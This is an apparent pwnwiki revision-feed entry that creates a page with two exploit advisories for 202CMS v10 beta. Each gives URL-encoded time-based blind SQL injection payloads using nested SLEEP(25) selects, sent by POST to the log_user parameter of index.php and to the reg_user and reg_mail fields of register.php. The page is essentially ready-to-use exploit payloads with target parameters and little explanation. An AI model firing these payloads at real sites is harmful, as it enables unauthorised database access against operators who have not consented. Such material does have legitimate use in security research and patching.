https://pwnwiki.com/index.php?action=history&feed=atom&title=202CMS_v10beta_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E 2026-04-06T14:59:14Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=202CMS_v10beta_-_Multiple_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2026&oldid=prev 2021-05-02T04:48:18Z

<p>Created page with &quot;==EXP== &lt;pre&gt; =========================================================================================== # Exploit Title: 202CMS - &#039;log_user&#039; SQL Inj. # Dork: N/A # Date: 20-...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> ===========================================================================================<br /> # Exploit Title: 202CMS - 'log_user' SQL Inj.<br /> # Dork: N/A<br /> # Date: 20-03-2019<br /> # Exploit Author: Mehmet EMIROGLU<br /> # Vendor Homepage: https://sourceforge.net/projects/b202cms/<br /> # Software Link: https://sourceforge.net/projects/b202cms/<br /> # Version: v10 beta<br /> # Category: Webapps<br /> # Tested on: Wamp64, Windows<br /> # CVE: N/A<br /> # Software Description: 202CMS is small, but functionally CMS. It is based<br /> on Twitter Bootstrap<br /> This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is<br /> highly customizable<br /> and extremely easy to setup. The script is not finished, but soon I'm<br /> going to finish it.<br /> ===========================================================================================<br /> # POC - SQLi (blind)<br /> # Parameters : log_user<br /> # Attack Pattern :<br /> 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f<br /> # POST Method : http://localhost/202cms10beta/index.php<br /> ===========================================================================================<br /> ###########################################################################################<br /> ===========================================================================================<br /> # Exploit Title: 202CMS - 'register.php' SQL Inj.<br /> # Dork: N/A<br /> # Date: 20-03-2019<br /> # Exploit Author: Mehmet EMIROGLU<br /> # Vendor Homepage: https://sourceforge.net/projects/b202cms/<br /> # Software Link: https://sourceforge.net/projects/b202cms/<br /> # Version: v10 beta<br /> # Category: Webapps<br /> # Tested on: Wamp64, Windows<br /> # CVE: N/A<br /> # Software Description: 202CMS is small, but functionally CMS. It is based<br /> on Twitter Bootstrap<br /> This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is<br /> highly customizable<br /> and extremely easy to setup. The script is not finished, but soon I'm<br /> going to finish it.<br /> ===========================================================================================<br /> # POC - SQLi (blind)<br /> # Parameters : register.php, reg_user,reg_mail<br /> # Attack Pattern :<br /> 1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f<br /> # Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27<br /> # POST Method : http://localhost/202cms10beta/register.php<br /> ===========================================================================================<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki